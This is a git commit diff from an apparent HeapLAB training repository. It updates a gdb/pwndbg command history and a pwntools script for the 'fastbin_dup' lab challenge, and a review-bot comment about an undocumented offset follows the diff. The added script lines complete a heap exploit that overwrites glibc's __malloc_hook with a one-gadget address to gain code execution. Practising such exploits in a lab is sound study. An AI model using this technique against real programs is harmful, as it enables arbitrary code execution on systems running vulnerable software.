From 93f5247d9c37732846b0d88136b2ce1908b361be Mon Sep 17 00:00:00 2001
From: Brett Weiland
Date: Mon, 4 Jan 2021 20:25:35 -0600
Subject: modified: HeapLAB/challenge-fastbin_dup/.gdb_history modified: HeapLAB/challenge-fastbin_dup/bruh.py
---
 HeapLAB/challenge-fastbin_dup/.gdb_history | 130 ++++++++++++++---------------
 HeapLAB/challenge-fastbin_dup/bruh.py | 7 +-
 2 files changed, 71 insertions(+), 66 deletions(-)
(limited to 'HeapLAB/challenge-fastbin_dup')
diff --git a/HeapLAB/challenge-fastbin_dup/.gdb_history b/HeapLAB/challenge-fastbin_dup/.gdb_history
index 4933f78..7bd5bb8 100644
--- a/HeapLAB/challenge-fastbin_dup/.gdb_history
+++ b/HeapLAB/challenge-fastbin_dup/.gdb_history
@@ -1,68 +1,3 @@
-c
-x 0x7f4854db6b40
-c
-x 0x7f4854db6b40
-x main_arena
-x &main_arena
-x &__malloc_hook
-x main_arena.top
-db main_arena.top
-c
-c
-c
-q
-print __malloc_hook
-print __malloc_hook
-fastbins
-c
-fastbins
-c
-vis_heap_chunks
-c
-fastbins
-r
-c
-fastbins
-print main_arena
-vis_heap
-c
-fastbins
-fastbins
-c
-fastbins
-r
-c
- quit
-db main_arena
-db &main_arena.fastbinsY
-q
-r
-c
-c
-fastbins
-print &main_arena
-print main_arena
-c
-print main_arena
-db main_arena
-db &main_arena
-db &main_arena/100
-db &main_arena 100
-db &main_arena 1000
-q
-db main_arena.bins
-db &main_arena.fastbinsY
-run
-c
-c
-q
-r
-c
-fastbins
-c
-fastbins
-c
-fastbins
 r
 c
 c
@@ -254,3 +189,68 @@ db 0x7f265fd4cb2d-1
 db
 c
 db &__malloc_hook-(16) (16*8)
+exit
+quit
+x rsp
+print $rsp+50
+print $rsp
+print $*rsp
+print $rsp
+print (void*)$rsp
+print (void*)$rsp+50
+print (void*)*$rsp+50
+print (void*)&$rsp+50
+x 0x7ffc1644e71a
+print (void*)&$rsp+50
+print (void*)$rsp+50
+print (void*)$rsp+0x50
+x 0x7ffc1644e738
+quit
+q
+print main_arena
+find_fake_fast &__malloc_hook
+q
+quit
+fastbins
+find_fake_fast &__malloc_hook
+print (void*)&__malloc_hook
+q
+x &__malloc_hook
+db &__malloc_hook-(16) (16*8)
+db &__malloc_hook-(16) (17*8)
+db &__malloc_hook-(16) (18*8)
+db &__malloc_hook-(16) (19*8)
+db &__malloc_hook-(16) (20*8)
+quit
+db &__malloc_hook-(16) (20*8)
+db &__malloc_hook-(16) (16*8)
+db &__malloc_hook-(16) (20*8)
+quit
+db &__malloc_hook-(16) (20*8)
+find_fake_fast &__malloc_hook
+db 0x7fd4a6cf7b2d-(16) (20*8)
+q
+print main_arena
+vis_heap_chunks
+db 0x7f37a78ddb7d-(16) (20*8)
+db 0x7f37a78ddb7d-(32) (20*8)
+quit
+db 0x7f37a78ddb7d-(32) (20*8)
+db main_arena.top-(32) (20*8)
+search 0x7f323f6f0fa1
+search 0x7f323f6f0fa1
+search --help
+search --qword 0x7f323f6f0fa1
+search -p 0x7f323f6f0fa1
+search -p 0x0fa1
+search -p 0xa10f
+search -hexp 0x7f323f6f0fa1
+search --hex 0x7f323f6f0fa1
+search --hex 7f323f6f0fa1
+search --hex -8 7f323f6f0fa1
+search -8 --hex 7f323f6f0fa1
+search -t qword --hex 7f323f6f0fa1
+search -t qword -x 7f323f6f0fa1
+search -t qword -x 0x7f323f6f0fa1
+search -t qword 0x7f323f6f0fa1
+quit
diff --git a/HeapLAB/challenge-fastbin_dup/bruh.py b/HeapLAB/challenge-fastbin_dup/bruh.py
index 56b0c71..df54957 100755
--- a/HeapLAB/challenge-fastbin_dup/bruh.py
+++ b/HeapLAB/challenge-fastbin_dup/bruh.py
@@ -74,9 +74,14 @@ malloc(119, 'sdfg') #8 * 9 -payload_loc = libc.sym.__malloc_hook - 35 +payload_loc = libc.sym.__malloc_hook - 35 #definetly the right thing malloc(119, p64(0)*9 + p64(payload_loc)) +#we now have things in place and shit +onegadget = libc.address + 0xe1fa1 +malloc(72, p64(0)*(35) + p64(onegadget)) + +print("onegadget: {}".format(hex(onegadget))) print("top chunk addr: {}".format(hex(payload_loc))) # ============================================================================= -- cgit v1.2.3
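Review bot: `onegadget = libc.address + 0xe1fa1` bakes an undocumented magic number into the script; a libc-relative offset like this is only meaningful for the one libc build it was measured against, and nothing in the hunk records which build that was, so a later reader cannot tell whether the value still applies. Hoist it into a named, commented constant, e.g. `ONE_GADGET_OFFSET = 0xe1fa1  # measured against libc <LIBC-BUILD-ID placeholder>; meaningless for any other build` and `onegadget = libc.address + ONE_GADGET_OFFSET`. The comment added to the payload_loc line, `#definetly the right thing`, records no reasoning (and has a typo); either note what the value was verified against or drop it, and the same applies to `#we now have things in place and shit`. The enclosing flat script continues on both sides of the hunk.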